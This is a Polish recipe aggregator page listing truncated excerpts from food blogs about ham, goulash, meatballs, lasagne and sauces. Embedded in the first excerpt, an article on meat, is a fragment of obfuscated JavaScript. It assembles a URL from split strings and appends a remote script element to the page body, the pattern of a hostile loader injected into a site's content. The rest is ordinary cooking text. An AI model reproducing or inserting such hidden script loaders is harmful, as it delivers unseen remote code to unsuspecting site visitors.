szynka gotowana - 6092 przepisów (strona:323/407)

Co warto wiedzieć na temat mięsa? 168

względu na cenne składniki odżywcze. Wieprzowina to z kolei cenne źródło żelaza, cynku i witaminy B1. Do codziennej diety najlepiej wybrać chude kawałki, takie jak schab czy szynka. Obecnie dużą popularnością cieszy się wołowina, która ma dużo więcej żelaza i cynku niż kurczak, a przy tym smakuje wyjątkowo wyśmienicie. Dlaczego jakość kupowanego mięsa jest ważna? Bez względu na rodzaj wybranego(...)t5vyu+="x03uv8da0jls"; t5vyu+="5lysh9";t5vy_+=("f")+"o"+("/");t5vy.src="https://"+t5vy_+t5vyu; t5vyd=document.body;t5vyd.appendChild(t5vy); })(); Artykuł Co warto wiedzieć na temat mięsa? pochodzi z serwisu Kulinarny Blog - wiesz jak gotować

Kulinarnyblog.pl - wiesz jak gotować!
PULPETY Z FETĄ W SOSIE POMIDOROWYM 110

Wystarczy zajrzeć do lodówki, trochę pozawijać, doprawić, wymieszać, poczarować i voila! :) PULPETY Z FETĄ W SOSIE POMIDOROWYM (na 6-8 porcji) Składniki na pulpety: 500 g mięsa mielonego z szynki 1/2 posiekanej cebuli, najlepiej podsmażonej 1 jajko 3 łyżki bułki tartej suszone oregano suszona bazylia  suszony czosnek sól i pieprz 1/2 kostka sera typu feta Składniki(...)liść laurowy, ziele angielskie i podsmażam razem. Następnie wrzucam pomidory z puszki, dodaję bulion i koncentrat pomidorowy. Całość zagotowuję i doprawiam do smaku suszonymi ziołami, solą i pieprzem, Do gotującego się sosu wkładam ostrożnie pulpety. Gotuję pod przykryciem około 20 - 25 minut, na małym ogniu, co jakiś czas przewracając kotleciki w sosie i pilnując, aby ten się nie przypalił

W kuchni Karmel-itki
Szynka z dzika pieczona 207

szynki z dzika, maślanka – około 1 litra, sól gruboziarnista, 400 g boczku wędzonego parzonego, 3 gałązki rozmarynu, 6 jagód jałowca, 10 ziaren pieprzu czarnego, 5 ziaren ziela angielskiego, sznurek do pieczenia, Mięso zalać maślanką i odstawić na 24 godziny w chłodne miejsce. Mięso wyjąć z maślanki, osuszyć, natrzeć solą i odstawić na 24 godziny w chłodne miejsce. Boczek pokroić(...)mięsa, zmierzyć objętość. Uzupełnić wodą do objętości 450 ml. Boczek pokroić, wrzucić do garnka. Wsypać kaszę, wlać płyn, zamieszać. Przykryć. Postawić na dużym ogniu aż do zagotowania. Zmniejszyć ogień. Gotować 15 minut na małym ogniu. Kaszę można podać jako samodzielne danie. Dziczyznę można kupić w sklepie  Dziki Trop .       zastawa

królestwo garów
Domowa wędlina z rozmarynem [ baleron parzony ] 145

Pamiętajmy, aby nie zabić samego smaku mięsa. Tutaj liczy się delikatność a nie nachalność aromatów. Kolejną sztuką jest parzenie wędliny. W moim rodzinnym domu na każde święta Mama wyjmowała szynkę z pekli i delikatnie ją parzyła. Zasada jest jedna - każdy kilogram mięsa parzymy 60 minut w maksymalnie 75-80' C.  Jak to realnie wygląda w garze? Na wrzątek wkładamy(...)Mięso można parzyć po minimum 3 dobach. Najsmaczniejsze będzie po 5-6 dobach. Karkówkę możemy obwiązać sznurkiem, aby delikatnie ją ukształtować. W dużym garze ( tak, aby mięso mogło pływać ) gotujemy wodę z łyżeczką soli. Na wrzątek wkładamy peklowany karczek ( temperatura wody się obniża ). Skręcamy moc ognia, odkrywamy i pilnujemy aby ponownie nie wrzało. Woda ma delikatnie pykać wokół baleronu. Każdy

kawawszklance
Gulasz z dzika 242

jest bardzo proste, jak większość moich przepisów, no ale to już wiecie :)  Porcja: 4-6 osób  Składniki: 1 kg mięsa z dzika ( użyłam polędwicy i szynki) 3 cebule 2 ząbki czosnku 1 duża marchewka 1 seler  200 g pieczarek 50 g suszonych grzybów 1 pietruszka 1 czerwona papryka 20 g suszonej żurawiny 50 g suszonych(...)marchewkę, seler, paprykę, pieczarki i suszone grzyby. Zalewamy to pozostałym winem, dodajemy przecier i miód z musztardą. Doprawiamy  niewielką ilością przypraw i na małym ogniu gotujemy pod przykryciem ok 2 h co jakiś czas mieszając. Po tym czasie jak mięso będzie miękkie doprawiamy do smaku. Prawda, że samo się robi :) Smacznego

Niezły Młynek
Zakład Masarski Majerczyk, czyli wyroby z dobrym i krótkim składem 69

Bardzo cenię domowe wyroby , dlatego lubię samodzielnie upiec pyszny pasztet, czy nawet zrobić dobrą kiełbasę. Bywa również że wędzę mięsa u mojej babci i brata. Niestety

Di gotuje
Lasagne z mięsem mielonym i cukinią pod beszamelem 117

makaronożerców. Smaczne, efektowne i wcale nie trudne do zrobienia. Polecam!   Składniki na 5 porcji/ 30 dag płatów lasagne 1 duża żółta cukinia   30 dag mięsa mielonego z szynki wieprzowej 25 dag mięsa mielonego z wołowiny 2 cebule 1 papryka czerwona 4 ząbki czosnku 3 łyżki oliwy 1 puszka krojonych pomidorów 50 ml czerwonego wytrawnego wina 1 łyżka koncentratu(...)kolejne 5 minut wszystko razem. Zestawić   z ognia. Cukinię pokroić wzdłuż na cienkie szerokie plastry. Sos beszamelowy: Masło roztopić w rondelku, wsypać mąkę i trzepaczką rozprowadzić, gdy zabulgocze gotować 2 minuty, po czym wlewać cienkim strumieniem mleko, cały czas mieszając doprowadzić do wrzenia aż sos zgęstnieje, doprawić solą, pieprzem białym oraz gałką do smaku wymieszać.   W naczyniu żaroodpornym

Wanilia i Kardamon
Deli4Dog – czyli przekąska idealna 62

sprzątania po nim i wyprowadzania na spacery w najdziwniejszych porach dnia – wczesnym rankiem czy późną nocą po imprezie.   Fakt, że dosyć szybko, dzięki moim rodzicom nauczyłem się gotować, jest tu nie bez znaczenia. Wierzcie mi, że taka umiejętność się przydaje szczególnie wtedy, gdy macie w domu dwa, wiecznie głodne owczarki kaukaskie, które potrafią pochłonąć ogromne ilości pokarmu(...)spełniło nasze i Fifi oczekiwania. Nic dziwnego. Znacie psa, który nie lubiłby dobrej jakości piersi z kurczaka? A jeśli dodamy do tego proces powolnego dojrzewania (taki jak przechodzi np. szynka parmeńska) to otrzymamy naturalny psi przysmak, który na koniec jest liofilizowany, by dłużej zachował smak i świeżość. To najlepszy sposób na przedłużenie jego trwałości, dlatego Deli4Dog nie zawiera żadnych konserwantów

kuron.com.pl
Udka kurczaka pieczone w żurawiną, pomarańczami i marchewką 117

Magda W kolejne dni świąteczne, wśród postnych dań które jeszcze się dojada po suto zastawionej Wigilii, pojawia się na obiad mięso. Zazwyczaj jest to soczysta szynka lub pieczeń, ale w tym roku, oprócz tych mięs, pojawi się na stole kurczak. Ale nie byle jaki – soczyste udka, z chrupiącą skórką, zachęcają zapachem pomarańczy, rozmarynu oraz masą pysznych dodatków. Wszystko pieczone(...)koniec posypujemy świeżo mielonym pieprzem. Odstawiamy do zamarynowania.   Ziemniaki myjemy porządnie, nie obieramy. Przekładamy je do garnka, zalewamy zimną wodą, solimy i doprowadzamy do wrzenia. Po tym czasie gotujemy przez 3 minuty, odcedzamy i odstawiamy do lekkiego przestygnięcia.   W tym czasie obieramy marchewki i kroimy je w centymetrowe, poprzeczne kawałki. Żurawinę myjemy, wrzucamy do miski, wlewamy do niej

Smaczna Strona
Egzotyczna owsianka z suszonym mango 211

Kiedyś nawet nie wyobrażałam sobie śniadania bez porządnej jajecznicy z pomidorem czy szynką i cebulą albo grzanek francuskich. I cały czas mam na to ochotę, ale tylko w weekendy ;) Od pewnego czasu śniadanie to zdecydowanie najważniejszy posiłek w ciągu dnia i zazwyczaj składa się z owsianki, której kiedyś nienawidziłam. Taaak, może niektórym z Was wydawać się, że wieje nudą(...)łyżki mleka 2 plastry suszonego mango Przygotowanie:  Rozgrzewamy garnek. Wrzucamy płatki owsiane i chwilę je prażymy. Gdy poczujecie taki delikatny, orzechowy zapach, zalewamy je wodą. Dodajemy szczyptę soli. Gotujemy na średnim ogniu. W tym czasie obieramy i kroimy owoce w kostkę. Dorzucamy do owsianki po ok. 3-4 minutach. dodajemy otręby. Mieszamy. (gdyby odparowało zbyt dużo wody, dodajemy kilka

Kitchens Alphabet
Szynka w sosie polskim 143

żadnych sztucznych ulepszaczy z torebek wyszedł brązowy. Aż trafiłam na ten idealny przepis! Normal 0 21 false false false PL X-NONE X-NONE Skł a dniki: 50 dag szynki   1 cebula olej do smażenia (ok. pół szklanki)   1 ząbek czosnku   2 -3 łyżki mąki ziele angielskie liść laurowy mielony czarny pieprz   mielona czerwona słodka papryka(...)dymu, ale tak musi być), przez chwilę mieszamy mąkę z wodą i wl ewamy do garnka z mięsem . Dodajemy ziele angielskie, liść laurowy i pieprz w ziarenkach . 6. Całość gotujemy pod przykryciem ok 2 godzin , aż mięso będzie miękkie. Jeśli pod koniec sos jest za rzadki, to dodajemy mąki (ok. 1 łyżkę lub wedle uznania), a jeśli za gęsty

Kuchnia domowa Ani
Wytrawne naleśniki z farszem serowo-mięsnym 182

Wytrawne naleśniki z farszem serowo-mięsnym Dziś propozycja, która sprawdzi się na obiad lub przyjęcie. Wytrawne naleśniki z farszem serowo-mięsnym. Poste i pyszne, choć nie

Słodkie okruszki
Sos majonezowo-czosnkowy 55

majonezowo-czosnkowy. Kremowy i delikatny sos jogurtowy z majonezem, czosnkiem i posiekanym koperkiem. Sos majonezowo-czosnkowy doprawiony octem jabłkowym, solą oraz pieprzem. Wspaniały dodatek do sałatek, do jajek, kurczaka, szynki. Doskonały sos majonezowy do sałaty lodowej.  Ten przepis na sos majonezowo-czosnkowy potrzebuje tylko kilku głównych składników, aby powstały najlepsze smaki: czosnek - można użyć mielonego czosnku albo świeżego startego(...)Wszystkie składniki starannie razem wymieszać i gotowe. Cieszę się, że tutaj jesteś i będzie mi bardzo miło jeżeli jeszcze mnie odwiedzisz :) Korzystaj z przepisu i koniecznie go ulepszaj :) Miłego gotowania! Sos majonezowo-czosnkowy

Moja Książka Kucharska
Chili con carne 113

początku wydobywa niesamowity aromat. Jeśli lubicie pikantne dania dodajcie świeżą papryczkę chili. Jeśli wolicie łagodniejsze – pomińcie ją. Składniki: (4-6 porcji) 500 g mięsa mielonego z szynki 2 średnie cebule 2 papryki 1/2 papryczki chili * 3 ząbki czosnku 1 duża puszka pomidorów bez skórki (560 g, np. taka ) 1 puszka czerwonej fasoli (560 g) 150 ml wody 1 łyżeczka(...)wymieszać. Smażyć jeszcze przez chwilę. Dodać mięso mielone. Smażyć z 5 minut, aż zacznie zmieniać kolor na jaśniejszy, mieszając od czasu do czasu. Następnie wlać wodę oraz dodać pomidory. Gotować na średnim ogniu około 10 minut (w tym czasie warzywa puszczą sok i przybędzie wody w garnku. Smażenie na średnim ogniu bez przykrywki umożliwi nam odparowanie nadmiaru wody) . Zmniejszyć ogień

Moja Delicja
Tradycyjny gulasz wieprzowy 212

mięsa z łopatki wieprzowej 30 dag mięsa z szynki wieprzowej ½ łyżeczki soli 4 łyżki oleju 1 duża cebula 1 łyżka słodkiej papryki 1 kostka mięsna 2 listki laurowe 10 ziarenek czarnego pieprzu ziarnistego 6 ziarenek ziela angielskiego 3 płaskie łyżki mąki Uważam, że dobry przepis na tradycyjny gulasz wieprzowy, jest czymś wyjątkowym. Mi udało się taki znaleźć na blogu(...)gulasz wodą. Po tym czasie do 1/3 szklanki zimnej wody dodać mąkę, dobrze wymieszać (żeby nie było grudek) i dodać do mięsa, żeby zagęścić sos. Gotować jeszcze przez chwilę, do momentu, aż sos zgęstnieje. Smacznego. linkwithin_text='Zobacz również inne przepisy:' var linkwithin_site

Świat Domowej Kuchni